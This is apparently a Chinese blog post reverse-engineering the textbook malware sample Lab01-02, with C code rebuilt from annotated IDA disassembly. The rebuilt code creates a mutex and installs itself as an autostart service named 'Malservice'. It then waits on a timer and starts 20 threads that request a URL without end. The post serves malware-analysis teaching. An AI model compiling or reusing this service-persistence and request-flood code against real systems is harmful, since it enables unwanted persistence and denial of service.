Lab01-02(逆向)
代码逆向之旅2
1 // Lab01-02_Reverse.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 2 // 3 4 #include<windows.h> 5 #include<stdio.h> 6 #include<stdlib.h> 7 #include<Wininet.h> 8 #pragma comment(lib,"Wininet.lib") 9 10 DWORD WINAPI StartAddress() 11 { 12 13 // .text : 00401150 14 // .text : 00401150 lpThreadParameter = dword ptr 4 15 // .text : 00401150 16 // .text : 00401150 push esi 17 // .text : 00401151 push edi 18 // .text : 00401152 push 0; dwFlags 19 // .text:00401154 push 0; lpszProxyBypass 20 // .text:00401156 push 0; lpszProxy 21 // .text:00401158 push 1; dwAccessType 22 // .text:0040115A push offset szAgent; "Internet Explorer 8.0" 23 // .text:0040115F call ds : InternetOpenA 24 HINTERNET hInternet = InternetOpenA("Internet Explorer 8.0",1,0,0,0); 25 while (TRUE) 26 { 27 // .text : 00401165 mov edi, ds : InternetOpenUrlA 28 // .text : 0040116B mov esi, eax 29 // .text : 0040116D 30 // .text : 0040116D loc_40116D : ; CODE XREF : StartAddress + 30↓j 31 // .text : 0040116D push 0; dwContext 32 // .text:0040116F push 80000000h; dwFlags 33 // .text:00401174 push 0; dwHeadersLength 34 // .text:00401176 push 0; lpszHeaders 35 // .text:00401178 push offset szUrl; "http://www.malwareanalysisbook.com" 36 // .text:0040117D push esi; hInternet 37 // .text:0040117E call edi; InternetOpenUrlA 38 InternetOpenUrlA(hInternet, "http://www.malwareanalysisbook.com", 0, 0, 0x80000000, 0); 39 // .text:00401180 jmp short loc_40116D 40 // .text:00401180 StartAddress endp*/ 41 42 } 43 } 44 45 int sub_401040() 46 { 47 48 // .text : 00401040 SystemTime = SYSTEMTIME ptr - 400h 49 SYSTEMTIME SystemTime; 50 // .text : 00401040 FileTime = _FILETIME ptr - 3F0h 51 _FILETIME FileTime; 52 // .text : 00401040 Filename = byte ptr - 3E8h 53 char Filename; 54 // .text : 00401046 push offset Name; "HGL345" 55 // .text:0040104B push 0; bInheritHandle 56 // .text:0040104D push 1F0001h; dwDesiredAccess 57 // .text:00401052 call ds : OpenMutexA 58 59 // .text : 00401058 test eax, eax 60 // .text:0040105A jz short loc_401064 61 if (OpenMutexA(0x1F0001, 0, "HGL345") != 0) 62 { 63 // .text : 0040105C push 0; uExitCode 64 // .text:0040105E call ds : ExitProcess 65 ExitProcess(0); 66 } 67 // .text : 00401064 loc_401064 : ; CODE XREF : sub_401040 + 1A↑j 68 // .text : 00401064 push esi 69 // .text : 00401065 push offset Name; "HGL345" 70 // .text:0040106A push 0; bInitialOwner 71 // .text:0040106C push 0; lpMutexAttributes 72 // .text:0040106E call ds : CreateMutexA 73 CreateMutexA(0, 0, "HGL345"); 74 // .text : 00401074 push 3; dwDesiredAccess 75 // .text:00401076 push 0; lpDatabaseName 76 // .text:00401078 push 0; lpMachineName 77 // .text:0040107A call ds : OpenSCManagerA 78 SC_HANDLE hSCManager = OpenSCManagerA(0, 0, 3); 79 // .text : 00401080 mov esi, eax 80 // .text:00401082 lea eax, [esp + 404h + Filename] 81 // .text:00401086 push 3E8h; nSize 82 // .text:0040108B push eax; lpFilename 83 // .text:0040108C push 0; hModule 84 // .text:0040108E call ds : GetModuleFileNameA 85 GetModuleFileNameA(0, &Filename, 0x3E8); 86 // .text : 00401094 push 0; lpPassword 87 // .text:00401096 push 0; lpServiceStartName 88 // .text:00401098 push 0; lpDependencies 89 // .text:0040109A push 0; lpdwTagId 90 // .text:0040109C lea ecx, [esp + 414h + Filename] 91 // .text:004010A0 push 0; lpLoadOrderGroup 92 // .text:004010A2 push ecx; lpBinaryPathName 93 // .text:004010A3 push 0; dwErrorControl 94 // .text:004010A5 push 2; dwStartType 95 // .text:004010A7 push 10h; dwServiceType 96 // .text:004010A9 push 2; dwDesiredAccess 97 // .text:004010AB push offset DisplayName; "Malservice" 98 // .text:004010B0 push offset DisplayName; "Malservice" 99 // .text:004010B5 push esi; hSCManager 100 // .text:004010B6 call ds : CreateServiceA 101 CreateServiceA(hSCManager, "Malservice", "Malservice", 2, 0x10, 2, 0, &Filename, 0, 0, 0, 0, 0); 102 // .text : 004010BC xor edx, edx 103 // .text : 004010BE lea eax, [esp + 404h + FileTime] 104 // .text : 004010C2 mov dword ptr[esp + 404h + SystemTime.wYear], edx 105 SystemTime.wYear = 0; 106 // .text : 004010C6 lea ecx, [esp + 404h + SystemTime] 107 // .text : 004010CA mov dword ptr[esp + 404h + SystemTime.wDayOfWeek], edx 108 SystemTime.wDayOfWeek = 0; 109 // .text : 004010CE push eax; lpFileTime 110 // .text:004010CF mov dword ptr[esp + 408h + SystemTime.wHour], edx 111 SystemTime.wHour = 0; 112 // .text : 004010D3 push ecx; lpSystemTime 113 // .text:004010D4 mov dword ptr[esp + 40Ch + SystemTime.wSecond], edx 114 SystemTime.wSecond = 0; 115 // .text : 004010D8 mov[esp + 40Ch + SystemTime.wYear], 834h 116 SystemTime.wYear = 0X834; 117 // .text : 004010DF call ds : SystemTimeToFileTime 118 SystemTimeToFileTime(&SystemTime, &FileTime); 119 // .text : 004010E5 push 0; lpTimerName 120 // .text:004010E7 push 0; bManualReset 121 // .text:004010E9 push 0; lpTimerAttributes 122 // .text:004010EB call ds : CreateWaitableTimerA 123 HANDLE hTimer = CreateWaitableTimerA(0, 0, 0); 124 // .text : 004010F1 push 0; fResume 125 // .text:004010F3 push 0; lpArgToCompletionRoutine 126 // .text:004010F5 push 0; pfnCompletionRoutine 127 // .text:004010F7 lea edx, [esp + 410h + FileTime] 128 // .text : 004010FB mov esi, eax 129 // .text : 004010FD push 0; lPeriod 130 // .text:004010FF push edx; lpDueTime 131 // .text:00401100 push esi; hTimer 132 // .text:00401101 call ds : SetWaitableTimer 133 SetWaitableTimer(hTimer, (const LARGE_INTEGER*)&FileTime, 0, 0, 0, 0); 134 // .text : 00401107 push 0FFFFFFFFh; dwMilliseconds 135 // .text:00401109 push esi; hHandle 136 // .text:0040110A call ds : WaitForSingleObject 137 138 // .text : 00401110 test eax, eax 139 // .text : 00401112 jnz short loc_40113F 140 if (WaitForSingleObject(hTimer, 0X0FFFFFFFF) == NULL) 141 { 142 // .text : 00401114 push edi 143 // .text : 00401115 mov edi, ds : CreateThread 144 145 // .text : 0040111B mov esi, 14h 146 int i = 0x14; 147 while (i != 0) 148 { 149 150 // .text : 00401120 151 // .text : 00401120 loc_401120 : ; CODE XREF : sub_401040 + F2↓j 152 // .text : 00401120 push 0; lpThreadId 153 // .text:00401122 push 0; dwCreationFlags 154 // .text:00401124 push 0; lpParameter 155 // .text:00401126 push offset StartAddress; lpStartAddress 156 // .text:0040112B push 0; dwStackSize 157 // .text:0040112D push 0; lpThreadAttributes 158 // .text:0040112F call edi; CreateThread 159 CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&StartAddress, 0, 0, 0); 160 // .text:00401131 dec esi 161 i--; 162 // .text : 00401132 jnz short loc_401120 163 // .text : 00401134 pop edi 164 } 165 // .text : 00401135 xor eax, eax 166 // .text : 00401137 pop esi 167 // .text : 00401138 add esp, 400h 168 // .text:0040113E retn 169 170 return 0; 171 172 } 173 // .text : 0040113F loc_40113F : ; CODE XREF : sub_401040 + D2↑j 174 // .text : 0040113F xor eax, eax 175 // .text : 00401141 pop esi 176 // .text : 00401142 add esp, 400h 177 // .text : 00401148 retn 178 return 0; 179 } 180 181 void main(int argc, const char** argv, const char** envp) 182 { 183 SERVICE_TABLE_ENTRYA ServiceStartTable = {NULL}; 184 185 // .text : 00401003 lea eax, [esp + 10h + ServiceStartTable] 186 // .text : 00401007 mov[esp + 10h + ServiceStartTable.lpServiceName], offset aMalservice; "MalService" 187 ServiceStartTable.lpServiceName = (LPSTR)"MalService"; 188 // .text:0040100F push eax; lpServiceStartTable 189 // .text:00401010 mov[esp + 14h + ServiceStartTable.lpServiceProc], offset sub_401040 190 ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)&sub_401040; 191 // .text : 00401018 mov[esp + 14h + var_8], 0 192 // .text:00401020 mov[esp + 14h + var_4], 0 193 // .text : 00401028 call ds : StartServiceCtrlDispatcherA 194 StartServiceCtrlDispatcherA((SERVICE_TABLE_ENTRYA *)&ServiceStartTable); 195 // .text : 0040102E push 0 196 // .text : 00401030 push 0 197 // .text : 00401032 call sub_401040 198 sub_401040(); 199 // .text : 00401037 add esp, 18h 200 201 }
浙公网安备 33010602011771号